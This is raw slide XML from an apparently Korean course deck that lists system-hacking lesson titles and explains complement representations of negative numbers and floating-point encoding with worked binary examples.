                        <a:t> &gt;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11</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컴퓨터 관리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11-1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a:t>시스템 관리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>시스템 로그 점검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a:t>이론 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Race Condition </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>이란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18"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11-2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a:t>시스템 관리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– R </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>명령어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시스템 해킹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권한상승 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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11-3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6</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Tshark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12</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이론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백도어란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin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12-1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시스템 침해예방 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>계정 우회 접속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시스템 해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>실습</a:t>
                      </a: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백도어</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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12-2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a:t>시스템 침해예방 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>계정 원격 접속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시스템 해킹</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                        <a:t>실습</a:t>
                      </a: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12-3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ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>음수의 표현</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 보수</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보수방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1's Complement)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>양수값의 비트를 반전시켜서 음수를 표현하는 방법</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 음수화 시켰을 때 다른 표현방법이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>됀다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보수방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(2's Complement)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보수값에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 한 값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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rPr>
              <a:t>     0000 0000 0000 0000 0000 0000 0010 1011(2) // 43(10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     1111 1111 1111 1111 1111 1111 1101 0100(2) // 43(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보수</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     1111 1111 1111 1111 1111 1111 1101 0101(2) // 43(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 보수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(-1) 0000 0000 0000 0000 0000 0000 0010 1011(2) // 43(10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">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부호 절대값 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Sign Magnitude)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부호 비트를 제외한 수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>양수값으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 읽고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부호비트에 따라 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+ - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>음수의 표현 </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보수</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>65450682</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>초의 </a:t>
            </a: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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 보수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 보수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>구하시오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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Math.pow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>a,b</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는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>승을 출력한다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a:t>time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>65450682, M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>변수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2^31 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 두고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>M-time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>진수로 구한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>보수가 맞는지 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="120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a:t>실수의 표현</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 부동소수점</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a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>Ex) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>43.6875 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>의 부동소수점 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="F7C041"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t> 43.6875</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="F7C041"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>101011.1011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="F7C041"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>010111011</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>2^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>+127 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Raleway"/>
              </a:rPr>
              <a:t>10000100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" i="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a:t>0</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>10000100</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>0101 1101 1000 0000 0000 000</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="FF0000"/>
